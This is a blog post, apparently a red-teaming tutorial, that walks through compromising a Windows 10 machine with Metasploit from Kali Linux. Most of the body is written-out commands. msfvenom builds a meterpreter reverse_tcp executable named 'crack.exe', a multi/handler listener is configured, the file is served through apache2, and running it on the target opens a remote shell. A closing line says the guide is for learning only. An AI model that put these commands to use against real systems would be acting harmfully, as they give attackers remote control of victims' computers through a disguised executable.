"How to Reset Your Kali Linux Password Using GRUB"

Image
How to Reset Root Password in Kali Linux Forgetting your Kali Linux password can be frustrating, but don't worry! You can reset it easily using the GRUB bootloader. In this guide, I'll walk you through the step-by-step process to reset your password and regain access to your Kali Linux system. Step 1: Access the GRUB Boot Menu Restart your Kali Linux machine. As the system boots, press Esc or Shift repeatedly until the GRUB menu appears. Step 2: Edit the GRUB Boot Entry In the GRUB menu, use the arrow keys to highlight "Advanced options for Kali GNU/Linux" (or just the default boot option if you don't see this). Press e to edit the boot parameters. Step 3: Modify the Boot Parameters Locate the line that starts with linux /boot/vmlinuz-...

Windows 10 Exploitation (Red Teaming)

Exploiting Windows 10 (latest update) using 

metasploit (in KALI): Cyberator

Introduction:

The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. 


This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box.


Step 1:

- Open terminal in Kali and type the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe



Step 2:

- Open terminal in Kali and type the following commands

   msfdb init

   msfconsole

   use exploit/multi/handler

   set payload windows/x64/meterpreter/reverse_tcp

   set lport 8080

   set lhost <your IP address>

   exploit




Step 3:

- Use apache2 command to start a local server so that the file could be accessed from other         system and paste the payload created into the /var/www/html folder




Step 4 :

- Access the file onto the windows system (target PC) and execute it.




Step 5:

- you will see a new meterpreter session opened in your Kali terminal. ☺






This is for only learning purpose, Don't use it without full permission.

Thank You.

Comments

Popular posts from this blog

"How to Reset Your Kali Linux Password Using GRUB"

"How to Reset Red Hat Linux Password Using GRUB – Step-by-Step Guide"